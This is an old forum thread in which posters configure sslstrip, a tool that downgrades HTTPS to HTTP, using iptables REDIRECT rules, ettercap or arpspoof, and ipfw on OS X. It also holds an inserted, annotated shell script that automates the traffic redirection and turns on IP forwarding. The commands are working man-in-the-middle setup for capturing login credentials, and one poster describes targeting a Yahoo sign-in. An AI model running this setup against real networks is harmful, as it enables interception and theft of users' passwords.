Posted 24 February 2009 - 06:48 PM
And please don't point me to Google. I do plan on playing with iptables in depth, but at a later date. ATM I'm interested in wifi attacks and want to play with a few before moving on.
BTW, I could not find any blog posts, guides or tutorials. If someone wrote one it would probably get to the top of Google quite quickly (although you would have to deal with the guilt of helping skiddies steal Facebook passwords).
Posted 24 February 2009 - 10:52 PM
I'm doing something a little different. I just want to try this on localhost, so I'm not doing any ARP spoofing. Instead, I'm just forwarding requests to port 80 to port 10000. Of course, this created a very confusing error. My test curl request was redirected to port 10000, and sslstrip got it. It then tried to connect to the server on port 80, which was then redirected to itself. It sat there making new threads until it died. I was debugging Python before I realized what was going on.
Anyway, here's my iptables command line.
sudo iptables -t nat -A OUTPUT -p tcp -m owner --uid-owner test --destination-port 80 -j REDIRECT --to-port 10000
The easiest way was to just make a user called test and filter only connection requests made by the test user.
I'm about to play with this further; I haven't even begun to start doing any SSL testing.
Posted 24 February 2009 - 11:05 PM
ssh test@localhost firefox
Posted 25 February 2009 - 01:27 PM
Posted 25 February 2009 - 10:38 PM
Posted 26 February 2009 - 12:38 AM
ssh -X test@localhost firefox
This is still not perfect. My previous advice of opening up https://gmail.google.com/ still protects you (but only on Gmail). This relies on having cleartext HTTP to mangle URLs to HTTPS form submissions. If the connection was initiated as HTTPS to begin with, there's nothing it can do.
Posted 26 February 2009 - 01:30 PM
Posted 26 February 2009 - 09:07 PM
Posted 08 March 2009 - 07:29 PM
Also, I got this running with ettercap with no problems at all. In all it only took me about 5 minutes, including figuring out how to use ettercap (which I'd never used before). The iptables command was definitely easier as well, since I didn't have to weed out unwanted traffic from my own computer.
iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 10000
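The two redirect setups in this thread (the localhost test with the owner match, and the PREROUTING rule used with ARP spoofing) put together as an added example; this is not code posted by anyone in the thread. Assumed names: the victim user is "test", the proxy listens on 10000 (sslstrip's default), the victim's traffic arrives on eth0, and the proxy is launched by whoever ran sudo. The would_loop check is there because of the self-redirect loop described above: if the proxy runs as the same uid the OUTPUT rule matches, its own upstream connections to port 80 are sent straight back to it.

```shell
#!/bin/sh
# Added example, not code from the thread: one script for both redirect
# setups discussed above. Assumed names: victim user "test", proxy port 10000
# (sslstrip's default), interface eth0, and the proxy running as PROXY_USER.
set -e

PROXY_PORT=10000
VICTIM_USER=test
PROXY_USER=${SUDO_USER:-root}   # whoever actually launches the proxy
IFACE=eth0

# Localhost test: only connections created by user $2 are redirected. Without
# the owner match the proxy's own upstream connections to port 80 would also
# be caught in nat/OUTPUT and sent back to the proxy (the loop in the thread).
local_redirect_args() {   # $1 = -A|-D, $2 = user, $3 = proxy port
    printf '%s' "-t nat $1 OUTPUT -p tcp -m owner --uid-owner $2 --dport 80 -j REDIRECT --to-ports $3"
}

# ARP-spoof/MITM test: the victim's packets arrive on interface $2 and hit
# nat/PREROUTING, which locally generated packets never traverse, so no owner
# match is needed. ip_forward must be on or the victim's other traffic stops.
mitm_redirect_args() {    # $1 = -A|-D, $2 = interface, $3 = proxy port
    printf '%s' "-t nat $1 PREROUTING -i $2 -p tcp --dport 80 -j REDIRECT --to-ports $3"
}

# Exit 0 (true) when the uid the proxy runs as is the uid being redirected:
# that configuration loops, because the proxy's upstream connections match
# its own redirect rule.
would_loop() {            # $1 = proxy uid, $2 = redirected uid
    [ "$1" = "$2" ]
}

apply() {                 # usage: apply add|del local|mitm
    case $1 in
        add) action=-A ;;
        del) action=-D ;;
        *) echo "usage: $0 add|del local|mitm" >&2; return 2 ;;
    esac
    [ "$(id -u)" -eq 0 ] || { echo "must run as root" >&2; return 1; }
    case $2 in
        local)
            if would_loop "$(id -u "$PROXY_USER")" "$(id -u "$VICTIM_USER")"; then
                echo "refusing: proxy and victim are the same user ($VICTIM_USER)" >&2
                return 1
            fi
            # word splitting of the generated argument list is intended
            iptables $(local_redirect_args "$action" "$VICTIM_USER" "$PROXY_PORT") ;;
        mitm)
            if [ "$action" = -A ]; then sysctl -w net.ipv4.ip_forward=1; fi
            iptables $(mitm_redirect_args "$action" "$IFACE" "$PROXY_PORT") ;;
        *) echo "usage: $0 add|del local|mitm" >&2; return 2 ;;
    esac
    iptables -t nat -L -n -v   # verify: the REDIRECT rule should be listed
}

# Only touches the firewall when invoked with arguments, e.g.:
#   sudo ./redirect.sh add local      (then: sudo ./redirect.sh del local)
if [ $# -gt 0 ]; then
    apply "$@"
fi
```

For the localhost case, start the proxy as your normal account and only run the client as the "test" user (for example with `ssh -X test@localhost firefox`, as suggested above); the script refuses to add the rule when both are the same uid. The `del` action removes exactly the rule it added, which matters because leftover nat rules are a common reason "nothing happens" the next time round.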
Posted 25 March 2009 - 12:39 AM
Trying this on a Mac, I tried using the ipfw command (as OS X doesn't support iptables). My ipfw command was: ipfw add fwd 127.0.0.1,80 tcp from any to any 10000. If anyone is familiar with ipfw on OS X, could you please advise? I think this must be the issue, as I got arpspoof working (downloaded MacPorts and dsniff) and also set the kernel sysctl forwarding to 1, and this was the remaining step.
Also, nothing was captured in the secret file when I signed onto Yahoo from my other laptop.
Thank you very much for any OS X information.